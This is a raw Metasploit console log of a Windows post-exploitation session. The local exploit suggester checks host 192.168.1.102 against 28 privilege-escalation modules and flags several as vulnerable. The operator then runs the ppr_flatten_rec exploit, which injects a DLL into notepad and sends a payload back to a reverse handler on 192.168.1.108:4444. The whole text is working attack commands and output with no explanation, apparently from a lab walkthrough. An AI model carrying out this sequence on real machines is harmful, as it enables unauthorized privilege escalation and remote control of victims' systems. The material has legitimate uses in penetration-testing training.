msf post(local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
msf post(local_exploit_suggester) > run
[*] 192.168.1.102 - Collecting local exploits for x86/windows...
[*] 192.168.1.102 - The following 28 exploit checks are being tried:
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated
[*] 192.168.1.102 - exploit/windows/local/bthpan
[*] 192.168.1.102 - exploit/windows/local/bypassuac
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection
[*] 192.168.1.102 - exploit/windows/local/ikeext_service
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate
[*] 192.168.1.102 - exploit/windows/local/mqac_write
[*] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d
[*] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast
[*] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei
[*] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl
[*] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy
[*] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting
[*] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec
[*] 192.168.1.102 - exploit/windows/local/service_permissions
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync: Cannot reliably check exploitability.
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bthpan: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bypassuac: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/mqac_write: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d: The target appears to be vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec: The target is vulnerable.
[*] 192.168.1.102 - exploit/windows/local/service_permissions: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions: The target is not exploitable.
[*] Post module execution completed
msf post(local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run
[*] Started reverse handler on 192.168.1.108:4444
[*] Launching notepad to host the exploit...
[+] Process 872 launched.
[*] Reflectively injecting the exploit DLL into 872...
[*] Injecting exploit into 872 ...
[*] Exploit injected. Injecting payload into 872...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.